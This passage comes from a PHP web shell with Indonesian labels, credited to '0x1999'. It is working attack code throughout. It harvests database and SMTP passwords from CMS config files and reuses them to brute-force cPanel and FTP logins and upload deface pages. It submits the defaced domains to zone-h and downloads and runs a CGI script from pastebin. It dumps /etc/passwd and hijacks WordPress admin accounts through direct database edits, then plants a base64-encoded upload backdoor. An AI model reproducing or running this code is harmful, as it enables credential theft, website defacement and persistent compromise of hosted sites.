  3230.                 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  3231.                     $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  3232.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  3233.                     $pass .= ambilkata($ambil,'password = "','"')."\n";
  3234.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  3235.                     $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  3236.                 } elseif(preg_match("/client/", $ambil)) {
  3237.                     preg_match("/password=(.*)/", $ambil, $pass1);
  3238.                     if(preg_match('/"/', $pass1[1])) {
  3239.                         $pass1[1] = str_replace('"', "", $pass1[1]);
  3240.                         $pass .= $pass1[1]."\n";
  3241.                     }
  3242.                 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  3243.                     $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  3244.                 }
  3245.             }
  3246.             echo $pass;
  3247.         }
  3248.         $cp_pass = cp_pass($dir);
  3249.         echo $cp_pass;
  3250.         echo "</textarea><br>
  3251.         <input type='submit' name='crack' style='width: 450px;' value='Crack'>
  3252.         </form>
  3253.         <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  3254.     }
  3255. } elseif($_GET['do'] == 'smtp') {
  3256.     echo "<center><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span></center><br>";
  3257.     function scj($dir) {
  3258.         $dira = scandir($dir);
  3259.         foreach($dira as $dirb) {
  3260.             if(!is_file("$dir/$dirb")) continue;
  3261.             $ambil = file_get_contents("$dir/$dirb");
  3262.             $ambil = str_replace("$", "", $ambil);
  3263.             if(preg_match("/JConfig|joomla/", $ambil)) {
  3264.                 $smtp_host = ambilkata($ambil,"smtphost = '","'");
  3265.                 $smtp_auth = ambilkata($ambil,"smtpauth = '","'");
  3266.                 $smtp_user = ambilkata($ambil,"smtpuser = '","'");
  3267.                 $smtp_pass = ambilkata($ambil,"smtppass = '","'");
  3268.                 $smtp_port = ambilkata($ambil,"smtpport = '","'");
  3269.                 $smtp_secure = ambilkata($ambil,"smtpsecure = '","'");
  3270.                 echo "SMTP Host: <font color=lime>$smtp_host</font><br>";
  3271.                 echo "SMTP port: <font color=lime>$smtp_port</font><br>";
  3272.                 echo "SMTP user: <font color=lime>$smtp_user</font><br>";
  3273.                 echo "SMTP pass: <font color=lime>$smtp_pass</font><br>";
  3274.                 echo "SMTP auth: <font color=lime>$smtp_auth</font><br>";
  3275.                 echo "SMTP secure: <font color=lime>$smtp_secure</font><br><br>";
  3276.             }
  3277.         }
  3278.     }
  3279.     $smpt_hunter = scj($dir);
  3280.     echo $smpt_hunter;
  3281. } elseif($_GET['do'] == 'auto_wp') {
  3282.     if($_POST['hajar']) {
  3283.         $title = htmlspecialchars($_POST['new_title']);
  3284.         $pn_title = str_replace(" ", "-", $title);
  3285.         if($_POST['cek_edit'] == "Y") {
  3286.             $script = $_POST['edit_content'];
  3287.         } else {
  3288.             $script = $title;
  3289.         }
  3290.         $conf = $_POST['config_dir'];
  3291.         $scan_conf = scandir($conf);
  3292.         foreach($scan_conf as $file_conf) {
  3293.             if(!is_file("$conf/$file_conf")) continue;
  3294.             $config = file_get_contents("$conf/$file_conf");
  3295.             if(preg_match("/WordPress/", $config)) {
  3296.                 $dbhost = ambilkata($config,"DB_HOST', '","'");
  3297.                 $dbuser = ambilkata($config,"DB_USER', '","'");
  3298.                 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  3299.                 $dbname = ambilkata($config,"DB_NAME', '","'");
  3300.                 $dbprefix = ambilkata($config,"table_prefix  = '","'");
  3301.                 $prefix = $dbprefix."posts";
  3302.                 $option = $dbprefix."options";
  3303.                 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3304.                 $db = mysql_select_db($dbname);
  3305.                 $q = mysql_query("SELECT * FROM $prefix ORDER BY ID ASC");
  3306.                 $result = mysql_fetch_array($q);
  3307.                 $id = $result[ID];
  3308.                 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  3309.                 $result2 = mysql_fetch_array($q2);
  3310.                 $target = $result2[option_value];
  3311.                 $update = mysql_query("UPDATE $prefix SET post_title='$title',post_content='$script',post_name='$pn_title',post_status='publish',comment_status='open',ping_status='open',post_type='post',comment_count='1' WHERE id='$id'");
  3312.                 $update .= mysql_query("UPDATE $option SET option_value='$title' WHERE option_name='blogname' OR option_name='blogdescription'");
  3313.                 echo "<div style='margin: 5px auto;'>";
  3314.                 if($target == '') {
  3315.                     echo "URL: <font color=red>error, gabisa ambil nama domain nya</font> -> ";
  3316.                 } else {
  3317.                     echo "URL: <a href='$target/?p=$id' target='_blank'>$target/?p=$id</a> -> ";
  3318.                 }
  3319.                 if(!$update OR !$conn OR !$db) {
  3320.                     echo "<font color=red>MySQL Error: ".mysql_error()."</font><br>";
  3321.                 } else {
  3322.                     echo "<font color=lime>sukses di ganti.</font><br>";
  3323.                 }
  3324.                 echo "</div>";
  3325.                 mysql_close($conn);
  3326.             }
  3327.         }
  3328.     } else {
  3329.         echo "<center>
  3330.         <h1>Auto Edit Title+Content WordPress</h1>
  3331.         <form method='post'>
  3332.         DIR Config: <br>
  3333.         <input type='text' size='50' name='config_dir' value='$dir'><br><br>
  3334.         Set Title: <br>
  3335.         <input type='text' name='new_title' value='Hacked By 0x1999' placeholder='New Title'><br><br>
  3336.         Edit Content?: <input type='radio' name='cek_edit' value='Y' checked>Y<input type='radio' name='cek_edit' value='N'>N<br>
  3337.         <span>Jika pilih <u>Y</u> masukin script defacemu ( saran yang simple aja ), kalo pilih <u>N</u> gausah di isi.</span><br>
  3338.         <textarea name='edit_content' placeholder='contoh script: http://pastebin.com/EpP671gK' style='width: 450px; height: 150px;'></textarea><br>
  3339.         <input type='submit' name='hajar' value='Hajar!' style='width: 450px;'><br>
  3340.         </form>
  3341.         <span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br>
  3342.         ";
  3343.     }
  3344. } elseif($_GET['do'] == 'zoneh') {
  3345.     if($_POST['submit']) {
  3346.         $domain = explode("\r\n", $_POST['url']);
  3347.         $nick =  $_POST['nick'];
  3348.         echo "Defacer Onhold: <a href='http://www.zone-h.org/archive/notifier=$nick/published=0' target='_blank'>http://www.zone-h.org/archive/notifier=$nick/published=0</a><br>";
  3349.         echo "Defacer Archive: <a href='http://www.zone-h.org/archive/notifier=$nick' target='_blank'>http://www.zone-h.org/archive/notifier=$nick</a><br><br>";
  3350.         function zoneh($url,$nick) {
  3351.             $ch = curl_init("http://www.zone-h.com/notify/single");
  3352.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  3353.                   curl_setopt($ch, CURLOPT_POST, true);
  3354.                   curl_setopt($ch, CURLOPT_POSTFIELDS, "defacer=$nick&domain1=$url&hackmode=1&reason=1&submit=Send");
  3355.             return curl_exec($ch);
  3356.                   curl_close($ch);
  3357.         }
  3358.         foreach($domain as $url) {
  3359.             $zoneh = zoneh($url,$nick);
  3360.             if(preg_match("/color=\"red\">OK<\/font><\/li>/i", $zoneh)) {
  3361.                 echo "$url -> <font color=lime>OK</font><br>";
  3362.             } else {
  3363.                 echo "$url -> <font color=red>ERROR</font><br>";
  3364.             }
  3365.         }
  3366.     } else {
  3367.         echo "<center><form method='post'>
  3368.         <u>Defacer</u>: <br>
  3369.         <input type='text' name='nick' size='50' value='0x1999'><br>
  3370.         <u>Domains</u>: <br>
  3371.         <textarea style='width: 450px; height: 150px;' name='url'></textarea><br>
  3372.         <input type='submit' name='submit' value='Submit' style='width: 450px;'>
  3373.         </form>";
  3374.     }
  3375.     echo "</center>";
  3376. }elseif($_GET['do'] == 'cpftp_auto') {
  3377.     if($_POST['crack']) {
  3378.         $usercp = explode("\r\n", $_POST['user_cp']);
  3379.         $passcp = explode("\r\n", $_POST['pass_cp']);
  3380.         $i = 0;
  3381.         foreach($usercp as $ucp) {
  3382.             foreach($passcp as $pcp) {
  3383.                 if(@mysql_connect('localhost', $ucp, $pcp)) {
  3384.                     if($_SESSION[$ucp] && $_SESSION[$pcp]) {
  3385.                     } else {
  3386.                         $_SESSION[$ucp] = "1";
  3387.                         $_SESSION[$pcp] = "1";
  3388.                         if($ucp == '' || $pcp == '') {
  3389.                             //
  3390.                         } else {
  3391.                             echo "[+] username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  3392.                             $ftp_conn = ftp_connect(gethostbyname($_SERVER['HTTP_HOST']));
  3393.                             $ftp_login = ftp_login($ftp_conn, $ucp, $pcp);
  3394.                             if((!$ftp_login) || (!$ftp_conn)) {
  3395.                                 echo "[+] <font color=red>Login Gagal</font><br><br>";
  3396.                             } else {
  3397.                                 echo "[+] <font color=lime>Login Sukses</font><br>";
  3398.                                 $fi = htmlspecialchars($_POST['file_deface']);
  3399.                                 $deface = ftp_put($ftp_conn, "public_html/$fi", $_POST['deface'], FTP_BINARY);
  3400.                                 if($deface) {
  3401.                                     $i++;
  3402.                                     echo "[+] <font color=lime>Deface Sukses</font><br>";
  3403.                                     if(function_exists('posix_getpwuid')) {
  3404.                                         $domain_cp = file_get_contents("/etc/named.conf"); 
  3405.                                         if($domain_cp == '') {
  3406.                                             echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
  3407.                                         } else {
  3408.                                             preg_match_all("#/var/named/(.*?).db#", $domain_cp, $domains_cp);
  3409.                                             foreach($domains_cp[1] as $dj) {
  3410.                                                 $user_cp_url = posix_getpwuid(@fileowner("/etc/valiases/$dj"));
  3411.                                                 $user_cp_url = $user_cp_url['name'];
  3412.                                                 if($user_cp_url == $ucp) {
  3413.                                                     echo "[+] <a href='http://$dj/$fi' target='_blank'>http://$dj/$fi</a><br><br>";
  3414.                                                     break;
  3415.                                                 }
  3416.                                             }
  3417.                                         }
  3418.                                     } else {
  3419.                                         echo "[+] <font color=red>gabisa ambil nama domain nya</font><br><br>";
  3420.                                     }
  3421.                                 } else {
  3422.                                     echo "[-] <font color=red>Deface Gagal</font><br><br>";
  3423.                                 }
  3424.                             }
  3425.                             //echo "username (<font color=lime>$ucp</font>) password (<font color=lime>$pcp</font>)<br>";
  3426.                         }
  3427.                     }
  3428.                 }
  3429.             }
  3430.         }
  3431.         if($i == 0) {
  3432.         } else {
  3433.             echo "<br>Sukses Deface ".$i." Cpanel by <font color=lime>JanCox.</font>";
  3434.         }
  3435.     } else {
  3436.         echo "<center>
  3437.         <form method='post'>
  3438.         Filename: <br>
  3439.         <input type='text' name='file_deface' placeholder='index.php' value='index.php' style='width: 450px;'><br>
  3440.         Deface Page: <br>
  3441.         <input type='text' name='deface' placeholder='http://www.web-yang-udah-do-deface.com/filemu.php' style='width: 450px;'><br>
  3442.         USER: <br>
  3443.         <textarea style='width: 450px; height: 150px;' name='user_cp'>";
  3444.         $_usercp = fopen("/etc/passwd","r");
  3445.         while($getu = fgets($_usercp)) {
  3446.             if($getu == '' || !$_usercp) {
  3447.                 echo "<font color=red>Can't read /etc/passwd</font>";
  3448.             } else {
  3449.                 preg_match_all("/(.*?):x:/", $getu, $u);
  3450.                 foreach($u[1] as $user_cp) {
  3451.                         if(is_dir("/home/$user_cp/public_html")) {
  3452.                             echo "$user_cp\n";
  3453.                     }
  3454.                 }
  3455.             }
  3456.         }
  3457.         echo "</textarea><br>
  3458.         PASS: <br>
  3459.         <textarea style='width: 450px; height: 200px;' name='pass_cp'>";
  3460.         function cp_pass($dir) {
  3461.             $pass = "";
  3462.             $dira = scandir($dir);
  3463.             foreach($dira as $dirb) {
  3464.                 if(!is_file("$dir/$dirb")) continue;
  3465.                 $ambil = file_get_contents("$dir/$dirb");
  3466.                 if(preg_match("/WordPress/", $ambil)) {
  3467.                     $pass .= ambilkata($ambil,"DB_PASSWORD', '","'")."\n";
  3468.                 } elseif(preg_match("/JConfig|joomla/", $ambil)) {
  3469.                     $pass .= ambilkata($ambil,"password = '","'")."\n";
  3470.                 } elseif(preg_match("/Magento|Mage_Core/", $ambil)) {
  3471.                     $pass .= ambilkata($ambil,"<password><![CDATA[","]]></password>")."\n";
  3472.                 } elseif(preg_match("/panggil fungsi validasi xss dan injection/", $ambil)) {
  3473.                     $pass .= ambilkata($ambil,'password = "','"')."\n";
  3474.                 } elseif(preg_match("/HTTP_SERVER|HTTP_CATALOG|DIR_CONFIG|DIR_SYSTEM/", $ambil)) {
  3475.                     $pass .= ambilkata($ambil,"'DB_PASSWORD', '","'")."\n";
  3476.                 } elseif(preg_match("/client/", $ambil)) {
  3477.                     preg_match("/password=(.*)/", $ambil, $pass1);
  3478.                     if(preg_match('/"/', $pass1[1])) {
  3479.                         $pass1[1] = str_replace('"', "", $pass1[1]);
  3480.                         $pass .= $pass1[1]."\n";
  3481.                     }
  3482.                 } elseif(preg_match("/cc_encryption_hash/", $ambil)) {
  3483.                     $pass .= ambilkata($ambil,"db_password = '","'")."\n";
  3484.                 }
  3485.             }
  3486.             echo $pass;
  3487.         }
  3488.         $cp_pass = cp_pass($dir);
  3489.         echo $cp_pass;
  3490.         echo "</textarea><br>
  3491.         <input type='submit' name='crack' style='width: 450px;' value='Hajar'>
  3492.         </form>
  3493.         <span>NB: CPanel Crack ini sudah auto get password ( pake db password ) maka akan work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span><br></center>";
  3494.     }
  3495. }
  3496.  elseif($_GET['do'] == 'cgi') {
  3497.     $cgi_dir = mkdir('idx_cgi', 0755);
  3498.     $file_cgi = "idx_cgi/cgi.izo";
  3499.     $isi_htcgi = "AddHandler cgi-script .izo";
  3500.     $htcgi = fopen(".htaccess", "w");
  3501.     $cgi_script = file_get_contents("http://pastebin.com/raw.php?i=XTUFfJLg");
  3502.     $cgi = fopen($file_cgi, "w");
  3503.     fwrite($cgi, $cgi_script);
  3504.     fwrite($htcgi, $isi_htcgi);
  3505.     chmod($file_cgi, 0755);
  3506.     echo "<iframe src='idx_cgi/cgi.izo' width='100%' height='100%' frameborder='0' scrolling='no'></iframe>";
  3507. } elseif($_GET['do'] == 'fake_root') {
  3508.     ob_start();
  3509.     function reverse($url) {
  3510.         $ch = curl_init("http://domains.yougetsignal.com/domains.php");
  3511.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  3512.               curl_setopt($ch, CURLOPT_POSTFIELDS,  "remoteAddress=$url&ket=");
  3513.               curl_setopt($ch, CURLOPT_HEADER, 0);
  3514.               curl_setopt($ch, CURLOPT_POST, 1);
  3515.         $resp = curl_exec($ch);
  3516.         $resp = str_replace("[","", str_replace("]","", str_replace("\"\"","", str_replace(", ,",",", str_replace("{","", str_replace("{","", str_replace("}","", str_replace(", ",",", str_replace(", ",",",  str_replace("'","", str_replace("'","", str_replace(":",",", str_replace('"','', $resp ) ) ) ) ) ) ) ) ) ))));
  3517.         $array = explode(",,", $resp);
  3518.         unset($array[0]);
  3519.         foreach($array as $lnk) {
  3520.             $lnk = "http://$lnk";
  3521.             $lnk = str_replace(",", "", $lnk);
  3522.             echo $lnk."\n";
  3523.             ob_flush();
  3524.             flush();
  3525.         }
  3526.               curl_close($ch);
  3527.     }
  3528.     function cek($url) {
  3529.         $ch = curl_init($url);
  3530.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1 );
  3531.               curl_setopt($ch, CURLOPT_FOLLOWLOCATION, true);
  3532.         $resp = curl_exec($ch);
  3533.         return $resp;
  3534.     }
  3535.     $cwd = getcwd();
  3536.     $ambil_user = explode("/", $cwd);
  3537.     $user = $ambil_user[2];
  3538.     if($_POST['reverse']) {
  3539.         $site = explode("\r\n", $_POST['url']);
  3540.         $file = $_POST['file'];
  3541.         foreach($site as $url) {
  3542.             $cek = cek("$url/~$user/$file");
  3543.             if(preg_match("/hacked/i", $cek)) {
  3544.                 echo "URL: <a href='$url/~$user/$file' target='_blank'>$url/~$user/$file</a> -> <font color=lime>Fake Root!</font><br>";
  3545.             }
  3546.         }
  3547.     } else {
  3548.         echo "<center><form method='post'>
  3549.         Filename: <br><input type='text' name='file' value='deface.html' size='50' height='10'><br>
  3550.         User: <br><input type='text' value='$user' size='50' height='10' readonly><br>
  3551.         Domain: <br>
  3552.         <textarea style='width: 450px; height: 250px;' name='url'>";
  3553.         reverse($_SERVER['HTTP_HOST']);
  3554.         echo "</textarea><br>
  3555.         <input type='submit' name='reverse' value='Scan Fake Root!' style='width: 450px;'>
  3556.         </form><br>
  3557.         NB: Sebelum gunain Tools ini , upload dulu file deface kalian di dir /home/user/ dan /home/user/public_html.</center>";
  3558.     }
  3559. } elseif($_GET['do'] == 'adminer') {
  3560.     $full = str_replace($_SERVER['DOCUMENT_ROOT'], "", $dir);
  3561.     function adminer($url, $isi) {
  3562.         $fp = fopen($isi, "w");
  3563.         $ch = curl_init();
  3564.               curl_setopt($ch, CURLOPT_URL, $url);
  3565.               curl_setopt($ch, CURLOPT_BINARYTRANSFER, true);
  3566.               curl_setopt($ch, CURLOPT_RETURNTRANSFER, true);
  3567.               curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, false);
  3568.               curl_setopt($ch, CURLOPT_FILE, $fp);
  3569.         return curl_exec($ch);
  3570.               curl_close($ch);
  3571.         fclose($fp);
  3572.         ob_flush();
  3573.         flush();
  3574.     }
  3575.     if(file_exists('adminer.php')) {
  3576.         echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  3577.     } else {
  3578.         if(adminer("https://www.adminer.org/static/download/4.2.4/adminer-4.2.4.php","adminer.php")) {
  3579.             echo "<center><font color=lime><a href='$full/adminer.php' target='_blank'>-> adminer login <-</a></font></center>";
  3580.         } else {
  3581.             echo "<center><font color=red>gagal buat file adminer</font></center>";
  3582.         }
  3583.     }
  3584. }elseif($_GET['do'] == 'passwbypass') {
  3585.     echo '<center>Bypass etc/passw With:<br>
  3586. <table style="width:50%">
  3587.   <tr>
  3588.     <td><form method="post"><input type="submit" value="System Function" name="syst"></form></td>
  3589.     <td><form method="post"><input type="submit" value="Passthru Function" name="passth"></form></td>
  3590.     <td><form method="post"><input type="submit" value="Exec Function" name="ex"></form></td>  
  3591.     <td><form method="post"><input type="submit" value="Shell_exec Function" name="shex"></form></td>      
  3592.     <td><form method="post"><input type="submit" value="Posix_getpwuid Function" name="melex"></form></td>
  3593. </tr></table>Bypass User With : <table style="width:50%">
  3594. <tr>
  3595.     <td><form method="post"><input type="submit" value="Awk Program" name="awkuser"></form></td>
  3596.     <td><form method="post"><input type="submit" value="System Function" name="systuser"></form></td>
  3597.     <td><form method="post"><input type="submit" value="Passthru Function" name="passthuser"></form></td>  
  3598.     <td><form method="post"><input type="submit" value="Exec Function" name="exuser"></form></td>      
  3599.     <td><form method="post"><input type="submit" value="Shell_exec Function" name="shexuser"></form></td>
  3600. </tr>
  3601. </table><br>';
  3602.  
  3603.  
  3604. if ($_POST['awkuser']) {
  3605. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  3606. echo shell_exec("awk -F: '{ print $1 }' /etc/passwd | sort");
  3607. echo "</textarea><br>";
  3608. }
  3609. if ($_POST['systuser']) {
  3610. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  3611. echo system("ls /var/mail");
  3612. echo "</textarea><br>";
  3613. }
  3614. if ($_POST['passthuser']) {
  3615. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  3616. echo passthru("ls /var/mail");
  3617. echo "</textarea><br>";
  3618. }
  3619. if ($_POST['exuser']) {
  3620. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  3621. echo exec("ls /var/mail");
  3622. echo "</textarea><br>";
  3623. }
  3624. if ($_POST['shexuser']) {
  3625. echo"<textarea class='inputzbut' cols='65' rows='15'>";
  3626. echo shell_exec("ls /var/mail");
  3627. echo "</textarea><br>";
  3628. }
  3629. if($_POST['syst'])
  3630. {
  3631. echo"<textarea class='inputz' cols='65' rows='15'>";
  3632. echo system("cat /etc/passwd");
  3633. echo"</textarea><br><br><b></b><br>";
  3634. }
  3635. if($_POST['passth'])
  3636. {
  3637. echo"<textarea class='inputz' cols='65' rows='15'>";
  3638. echo passthru("cat /etc/passwd");
  3639. echo"</textarea><br><br><b></b><br>";
  3640. }
  3641. if($_POST['ex'])
  3642. {
  3643. echo"<textarea class='inputz' cols='65' rows='15'>";
  3644. echo exec("cat /etc/passwd");
  3645. echo"</textarea><br><br><b></b><br>";
  3646. }
  3647. if($_POST['shex'])
  3648. {
  3649. echo"<textarea class='inputz' cols='65' rows='15'>";
  3650. echo shell_exec("cat /etc/passwd");
  3651. echo"</textarea><br><br><b></b><br>";
  3652. }
  3653. echo '<center>';
  3654. if($_POST['melex'])
  3655. {
  3656. echo"<textarea class='inputz' cols='65' rows='15'>";
  3657. for($uid=0;$uid<60000;$uid++){
  3658. $ara = posix_getpwuid($uid);
  3659. if (!empty($ara)) {
  3660. while (list ($key, $val) = each($ara)){
  3661. print "$val:";
  3662. }
  3663. print "\n";
  3664. }
  3665. }
  3666. echo"</textarea><br><br>";
  3667. }
  3668. //
  3669.  
  3670. //
  3671. } elseif($_GET['do'] == 'auto_dwp') {
  3672.     if($_POST['auto_deface_wp']) {
  3673.         function anucurl($sites) {
  3674.             $ch = curl_init($sites);
  3675.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3676.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3677.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  3678.                   curl_setopt($ch, CURLOPT_CONNECTTIMEOUT, 5);
  3679.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3680.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3681.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3682.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3683.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  3684.             $data = curl_exec($ch);
  3685.                   curl_close($ch);
  3686.             return $data;
  3687.         }
  3688.         function lohgin($cek, $web, $userr, $pass, $wp_submit) {
  3689.             $post = array(
  3690.                    "log" => "$userr",
  3691.                    "pwd" => "$pass",
  3692.                    "rememberme" => "forever",
  3693.                    "wp-submit" => "$wp_submit",
  3694.                    "redirect_to" => "$web",
  3695.                    "testcookie" => "1",
  3696.                    );
  3697.             $ch = curl_init($cek);
  3698.                   curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3699.                   curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3700.                   curl_setopt($ch, CURLOPT_USERAGENT, "Mozilla/5.0 (Windows NT 6.1; rv:32.0) Gecko/20100101 Firefox/32.0");
  3701.                   curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3702.                   curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3703.                   curl_setopt($ch, CURLOPT_POST, 1);
  3704.                   curl_setopt($ch, CURLOPT_POSTFIELDS, $post);
  3705.                   curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3706.                   curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3707.                   curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  3708.             $data = curl_exec($ch);
  3709.                   curl_close($ch);
  3710.             return $data;
  3711.         }
  3712.         $scan = $_POST['link_config'];
  3713.         $link_config = scandir($scan);
  3714.         $script = htmlspecialchars($_POST['script']);
  3715.         $user = "0x1999";
  3716.         $pass = "0x1999";
  3717.         $passx = md5($pass);
  3718.         foreach($link_config as $dir_config) {
  3719.             if(!is_file("$scan/$dir_config")) continue;
  3720.             $config = file_get_contents("$scan/$dir_config");
  3721.             if(preg_match("/WordPress/", $config)) {
  3722.                 $dbhost = ambilkata($config,"DB_HOST', '","'");
  3723.                 $dbuser = ambilkata($config,"DB_USER', '","'");
  3724.                 $dbpass = ambilkata($config,"DB_PASSWORD', '","'");
  3725.                 $dbname = ambilkata($config,"DB_NAME', '","'");
  3726.                 $dbprefix = ambilkata($config,"table_prefix  = '","'");
  3727.                 $prefix = $dbprefix."users";
  3728.                 $option = $dbprefix."options";
  3729.                 $conn = mysql_connect($dbhost,$dbuser,$dbpass);
  3730.                 $db = mysql_select_db($dbname);
  3731.                 $q = mysql_query("SELECT * FROM $prefix ORDER BY id ASC");
  3732.                 $result = mysql_fetch_array($q);
  3733.                 $id = $result[ID];
  3734.                 $q2 = mysql_query("SELECT * FROM $option ORDER BY option_id ASC");
  3735.                 $result2 = mysql_fetch_array($q2);
  3736.                 $target = $result2[option_value];
  3737.                 if($target == '') {                
  3738.                     echo "[-] <font color=red>error, gabisa ambil nama domain nya</font><br>";
  3739.                 } else {
  3740.                     echo "[+] $target <br>";
  3741.                 }
  3742.                 $update = mysql_query("UPDATE $prefix SET user_login='$user',user_pass='$passx' WHERE ID='$id'");
  3743.                 if(!$conn OR !$db OR !$update) {
  3744.                     echo "[-] MySQL Error: <font color=red>".mysql_error()."</font><br><br>";
  3745.                     mysql_close($conn);
  3746.                 } else {
  3747.                     $site = "$target/wp-login.php";
  3748.                     $site2 = "$target/wp-admin/theme-install.php?upload";
  3749.                     $b1 = anucurl($site2);
  3750.                     $wp_sub = ambilkata($b1, "id=\"wp-submit\" class=\"button button-primary button-large\" value=\"","\" />");
  3751.                     $b = lohgin($site, $site2, $user, $pass, $wp_sub);
  3752.                     $anu2 = ambilkata($b,"name=\"_wpnonce\" value=\"","\" />");
  3753.                     $upload3 = base64_decode("Z2FudGVuZw0KPD9waHANCiRmaWxlMyA9ICRfRklMRVNbJ2ZpbGUzJ107DQogICRuZXdmaWxlMz0iay5waHAiOw0KICAgICAgICAgICAgICAgIGlmIChmaWxlX2V4aXN0cygiLi4vLi4vLi4vLi4vIi4kbmV3ZmlsZTMpKSB1bmxpbmsoIi4uLy4uLy4uLy4uLyIuJG5ld2ZpbGUzKTsNCiAgICAgICAgbW92ZV91cGxvYWRlZF9maWxlKCRmaWxlM1sndG1wX25hbWUnXSwgIi4uLy4uLy4uLy4uLyRuZXdmaWxlMyIpOw0KDQo/Pg==");
  3754.                     $www = "m.php";
  3755.                     $fp5 = fopen($www,"w");
  3756.                     fputs($fp5,$upload3);
  3757.                     $post2 = array(
  3758.                             "_wpnonce" => "$anu2",
  3759.                             "_wp_http_referer" => "/wp-admin/theme-install.php?upload",
  3760.                             "themezip" => "@$www",
  3761.                             "install-theme-submit" => "Install Now",
  3762.                             );
  3763.                     $ch = curl_init("$target/wp-admin/update.php?action=upload-theme");
  3764.                           curl_setopt($ch, CURLOPT_RETURNTRANSFER, 1);
  3765.                           curl_setopt($ch, CURLOPT_FOLLOWLOCATION, 1);
  3766.                           curl_setopt($ch, CURLOPT_SSL_VERIFYPEER, 0);
  3767.                           curl_setopt($ch, CURLOPT_SSL_VERIFYHOST, 0);
  3768.                           curl_setopt($ch, CURLOPT_POST, 1);
  3769.                           curl_setopt($ch, CURLOPT_POSTFIELDS, $post2);
  3770.                           curl_setopt($ch, CURLOPT_COOKIEJAR,'cookie.txt');
  3771.                           curl_setopt($ch, CURLOPT_COOKIEFILE,'cookie.txt');
  3772.                           curl_setopt($ch, CURLOPT_COOKIESESSION, true);
  3773.                     $data3 = curl_exec($ch);
  3774.                           curl_close($ch);
  3775.                     $y = date("Y");
  3776.                     $m = date("m");
  3777.                     $namafile = "id.php";
  3778.                     $fpi = fopen($namafile,"w");
  3779.                     fputs($fpi,$script);
  3780.                     $ch6 = curl_init("$target/wp-content/uploads/$y/$m/$www");
  3781.                            curl_setopt($ch6, CURLOPT_POST, true);
  3782.                            curl_setopt($ch6, CURLOPT_POSTFIELDS, array('file3'=>"@$namafile"));
  3783.                            curl_setopt($ch6, CURLOPT_RETURNTRANSFER, 1);
  3784.                            curl_setopt($ch6, CURLOPT_COOKIEFILE, "cookie.txt");
  3785.                            curl_setopt($ch6, CURLOPT_COOKIEJAR,'cookie.txt');
  3786.                            curl_setopt($ch6, CURLOPT_COOKIESESSION, true);
  3787.                     $postResult = curl_exec($ch6);
  3788.                            curl_close($ch6);
  3789.                     $as = "$target/k.php";
  3790.                     $bs = anucurl($as);
  3791.                     if(preg_match("#$script#is", $bs)) {
  3792.                         echo "[+] <font color='lime'>berhasil mepes...</font><br>";
  3793.                         echo "[+] <a href='$as' target='_blank'>$as</a><br><br>";
  3794.                         } else {
  3795.                         echo "[-] <font color='red'>gagal mepes...</font><br>";
  3796.                         echo "[!!] coba aja manual: <br>";
  3797.                         echo "[+] <a href='$target/wp-login.php' target='_blank'>$target/wp-login.php</a><br>";
  3798.                         echo "[+] username: <font color=lime>$user</font><br>";
  3799.                         echo "[+] password: <font color=lime>$pass</font><br><br>";    
  3800.                         }
  3801.                     mysql_close($conn);
  3802.                 }
  3803.             }
  3804.         }
  3805.     } else {
  3806.         echo "<center><h1>WordPress Auto Deface</h1>
  3807.         <form method='post'>
  3808.         <input type='text' name='link_config' size='50' height='10' value='$dir'><br>
  3809.         <input type='text' name='script' height='10' size='50' placeholder='Hacked By 0x1999' required><br>
  3810.         <input type='submit' style='width: 450px;' name='auto_deface_wp' value='Hajar!!'>
  3811.         </form>
  3812.         <br><span>NB: Tools ini work jika dijalankan di dalam folder <u>config</u> ( ex: /home/user/public_html/nama_folder_config )</span>
  3813.         </center>";
  3814.     }
  3815. } elseif($_GET['do'] == 'auto_dwp2') {
  3816.     if($_POST['auto_deface_wp']) {
